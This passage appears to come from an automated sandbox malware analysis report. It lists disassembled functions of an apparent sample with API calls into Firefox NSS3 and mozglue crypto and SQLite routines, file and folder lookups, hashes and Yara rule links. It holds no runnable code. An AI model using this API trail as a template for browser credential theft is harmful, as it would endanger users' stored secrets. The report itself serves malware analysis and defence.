                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                          • String ID:
                                                                                          • API String ID: 2459274275-0
                                                                                          • Opcode ID: 95ebff898b7555e3b4a0281fa2b1d921b5163a53febe782a5d048acc09f9855c
                                                                                          • Instruction ID: 1fbe928c43611deae2299f4b2cb049bff5d3cea2f8cad3e3d214afc9cdd69b7e
                                                                                          • Opcode Fuzzy Hash: 95ebff898b7555e3b4a0281fa2b1d921b5163a53febe782a5d048acc09f9855c
                                                                                          • Instruction Fuzzy Hash: E94191B1E0024AAFDF118FA9DC45BEE7BB9EF48358F004029F914A7750E772C9158BA5
                                                                                          Function 6CB52E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CB42D1A), ref: 6CB52E7E
                                                                                            • Part of subcall function 6CBA07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB48298,?,?,?,6CB3FCE5,?), ref: 6CBA07BF
                                                                                            • Part of subcall function 6CBA07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBA07E6
                                                                                            • Part of subcall function 6CBA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBA081B
                                                                                            • Part of subcall function 6CBA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBA0825
                                                                                          • PR_Now.NSS3 ref: 6CB52EDF
                                                                                          • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CB52EE9
                                                                                          • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CB42D1A), ref: 6CB52F01
                                                                                          • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CB42D1A), ref: 6CB52F50
                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CB52F81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                          • String ID:
                                                                                          • API String ID: 287051776-0
                                                                                          • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                          • Instruction ID: 52d808c560a81e0e689b353a7fbe8c256e423f46b6f482af2b35e7712f4f3de0
                                                                                          • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                          • Instruction Fuzzy Hash: 3231C4716033C086FF10DE55FC88BBE7265EB81318FA44579D41A97AD0EB32986AC653
                                                                                          Function 6CB40E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CERT_DecodeAVAValue.NSS3(?,?,6CB40A2C), ref: 6CB40E0F
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CB40A2C), ref: 6CB40E73
                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CB40A2C), ref: 6CB40E85
                                                                                          • PORT_ZAlloc_Util.NSS3(00000001,?,?,6CB40A2C), ref: 6CB40E90
                                                                                          • free.MOZGLUE(00000000), ref: 6CB40EC4
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CB40A2C), ref: 6CB40ED9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                          • String ID:
                                                                                          • API String ID: 3618544408-0
                                                                                          • Opcode ID: 050a089b7c488ded18e6d9ee03537638178f0738fde4fc8fecfd6ae3d793091d
                                                                                          • Instruction ID: b98d59fe76497ba044eea724dc35628379853973b47aad434d004fa6798cfec7
                                                                                          • Opcode Fuzzy Hash: 050a089b7c488ded18e6d9ee03537638178f0738fde4fc8fecfd6ae3d793091d
                                                                                          • Instruction Fuzzy Hash: 85214E72E882D597EB004976BC45F6B72AEDFE1648F098035D81C53A09EA61C835A293
                                                                                          Function 0041AD4C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __lock.LIBCMT ref: 0041AD5A
                                                                                            • Part of subcall function 0041A97C: __mtinitlocknum.LIBCMT ref: 0041A992
                                                                                            • Part of subcall function 0041A97C: __amsg_exit.LIBCMT ref: 0041A99E
                                                                                            • Part of subcall function 0041A97C: EnterCriticalSection.KERNEL32(?,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041A9A6
                                                                                          • DecodePointer.KERNEL32(0042A0C8,00000020,0041AE9D,?,00000001,00000000,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E), ref: 0041AD96
                                                                                          • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADA7
                                                                                            • Part of subcall function 0041B7F5: EncodePointer.KERNEL32(00000000,0041BA52,0042BDB8,00000314,00000000,?,?,?,?,?,0041B0C8,0042BDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B7F7
                                                                                          • DecodePointer.KERNEL32(-00000004,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADCD
                                                                                          • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADE0
                                                                                          • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADEA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                          • String ID:
                                                                                          • API String ID: 2005412495-0
                                                                                          • Opcode ID: 9dbc0315d39e44e03e69b1948a2dcd69f9a60bb4760d8e37f8bab661b8eb1333
                                                                                          • Instruction ID: 26cd67dfac1a625c080c990f5aa3a4e8d575379cc8cf2dcf3c78269be391da57
                                                                                          • Opcode Fuzzy Hash: 9dbc0315d39e44e03e69b1948a2dcd69f9a60bb4760d8e37f8bab661b8eb1333
                                                                                          • Instruction Fuzzy Hash: CB3129B09423498FDF109FA9D9452DEBBF1BF48314F14402BD410A6251DBBC48A5CF6E
                                                                                          Function 6CB4AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6CB4AEB3
                                                                                          • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CB4AECA
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB4AEDD
                                                                                          • PR_SetError.NSS3(FFFFE022,00000000), ref: 6CB4AF02
                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CC69500), ref: 6CB4AF23
                                                                                            • Part of subcall function 6CB9F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CB9F0C8
                                                                                            • Part of subcall function 6CB9F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB9F122
                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB4AF37
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                          • String ID:
                                                                                          • API String ID: 3714604333-0
                                                                                          • Opcode ID: 68551f947ee2b69c4939be7b2fa2dadb6ddae65aca21261b1ddefb2164d8654f
                                                                                          • Instruction ID: e0862bf6b82a427cb32a5f0407751efd6ea9683c047840bc8b4b71a11df57254
                                                                                          • Opcode Fuzzy Hash: 68551f947ee2b69c4939be7b2fa2dadb6ddae65aca21261b1ddefb2164d8654f
                                                                                          • Instruction Fuzzy Hash: E02128B190D240ABEB108F189C41B9A7BA4EF8576CF148329FC649B785E731D9058BA7
                                                                                          Function 6CBCEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBCEE85
                                                                                          • realloc.MOZGLUE(1BAF25D8,?), ref: 6CBCEEAE
                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6CBCEEC5
                                                                                            • Part of subcall function 6CBA0BE0: malloc.MOZGLUE(6CB98D2D,?,00000000,?), ref: 6CBA0BF8
                                                                                            • Part of subcall function 6CBA0BE0: TlsGetValue.KERNEL32(6CB98D2D,?,00000000,?), ref: 6CBA0C15
                                                                                          • htonl.WSOCK32(?), ref: 6CBCEEE3
                                                                                          • htonl.WSOCK32(00000000,?), ref: 6CBCEEED
                                                                                          • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CBCEF01
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                          • String ID:
                                                                                          • API String ID: 1351805024-0
                                                                                          • Opcode ID: 53ca209db3a8b4a45392d7e68c4faeaef9c6c15fa1324ef1676f4bc533c155db
                                                                                          • Instruction ID: b8fc5586ec52f16a7c0c5b0cd1f79ab71397dba9359b15819d15b2be65471474
                                                                                          • Opcode Fuzzy Hash: 53ca209db3a8b4a45392d7e68c4faeaef9c6c15fa1324ef1676f4bc533c155db
                                                                                          • Instruction Fuzzy Hash: 0821BF71A00255DFDB109F28DC81A9AB7A4EF49398F148129EC199B642E730E914CBE7
                                                                                          Function 6CB7EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB7EE49
                                                                                            • Part of subcall function 6CB9FAB0: free.MOZGLUE(?,-00000001,?,?,6CB3F673,00000000,00000000), ref: 6CB9FAC7
                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CB7EE5C
                                                                                          • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CB7EE77
                                                                                          • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CB7EE9D
                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB7EEB3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                          • String ID:
                                                                                          • API String ID: 886189093-0
                                                                                          • Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                          • Instruction ID: 1284a86da5c30f07b943c6c8500ca3c7bf48a8830850a2e2906fa2e308e62c63
                                                                                          • Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                          • Instruction Fuzzy Hash: 8F21C3B6A002906FEB118E69DC81EAFB7A8EF45718F040564FD189B751E671EC1487F1
                                                                                          Function 0041C3CD Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 0041C3D9
                                                                                            • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
                                                                                            • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
                                                                                          • __amsg_exit.LIBCMT ref: 0041C3F9
                                                                                          • __lock.LIBCMT ref: 0041C409
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0041C426
                                                                                          • free.MSVCRT(?,?,?,00000003,0041B5E0,0042A108,00000008), ref: 0041C439
                                                                                          • InterlockedIncrement.KERNEL32(0042B558), ref: 0041C451
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                          • String ID:
                                                                                          • API String ID: 634100517-0
                                                                                          • Opcode ID: 68cb7e6ea9f2ec8c328fe504e648b6640a528a258a727550de86b644f98f4ab2
                                                                                          • Instruction ID: 347e950a9de730bb6983817e76a39e35d30df20f4a69820d490e6e24dcd4e02e
                                                                                          • Opcode Fuzzy Hash: 68cb7e6ea9f2ec8c328fe504e648b6640a528a258a727550de86b644f98f4ab2
                                                                                          • Instruction Fuzzy Hash: 7D010431A826219BD720AB669C857EEB760BB04714F41811BE94463391CB3C68D2CFDE
                                                                                          Function 6CB2AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB2AFDA
                                                                                          Strings
                                                                                          • %s at line %d of [%.10s], xrefs: 6CB2AFD3
                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB2AFC4
                                                                                          • unable to delete/modify collation sequence due to active statements, xrefs: 6CB2AF5C
                                                                                          • misuse, xrefs: 6CB2AFCE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_log
                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                          • API String ID: 632333372-924978290
                                                                                          • Opcode ID: ab294ebf9306333b22878d631effd161ea3983f1bf6d6431ff60e1cf2595767d
                                                                                          • Instruction ID: 2050a2f5e1665049ba5e377d4398e9fa4569092c2acc6a6d14fed853b18fe2c6
                                                                                          • Opcode Fuzzy Hash: ab294ebf9306333b22878d631effd161ea3983f1bf6d6431ff60e1cf2595767d
                                                                                          • Instruction Fuzzy Hash: 6F91E171A002958FDB14CF59C850ABAB7F1FF45314F1945A8E869AB791D738AC02CF61
                                                                                          Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID: zn@$zn@
                                                                                          • API String ID: 1029625771-1156428846
                                                                                          • Opcode ID: 25f82b5059035671600d9e83034a035f120b2cca1b3f6827d3773b31035260a8
                                                                                          • Instruction ID: c22392a9749b90d4c1c61cacca4cad5c9228f9bc2143d6a913daecdb3f55fa98
                                                                                          • Opcode Fuzzy Hash: 25f82b5059035671600d9e83034a035f120b2cca1b3f6827d3773b31035260a8
                                                                                          • Instruction Fuzzy Hash: F171D974A00109DFDB04CF48C484BAAB7B2FF88315F158179E84AAF395C739AA91CF95
                                                                                          Function 00414260 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • lstrcat.KERNEL32(?,0081A8B0), ref: 004142BB
                                                                                            • Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 004142E1
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00414300
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00414314
                                                                                          • lstrcat.KERNEL32(?,00815940), ref: 00414327
                                                                                          • lstrcat.KERNEL32(?,?), ref: 0041433B
                                                                                          • lstrcat.KERNEL32(?,0081B818), ref: 0041434F
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 00418830: GetFileAttributesA.KERNEL32(00000000,?,0040FF57,?,00000000,?,00000000,00420D97,00420D96), ref: 0041883F
                                                                                            • Part of subcall function 00414050: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414060
                                                                                            • Part of subcall function 00414050: HeapAlloc.KERNEL32(00000000), ref: 00414067
                                                                                            • Part of subcall function 00414050: wsprintfA.USER32 ref: 00414086
                                                                                            • Part of subcall function 00414050: FindFirstFileA.KERNEL32(?,?), ref: 0041409D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
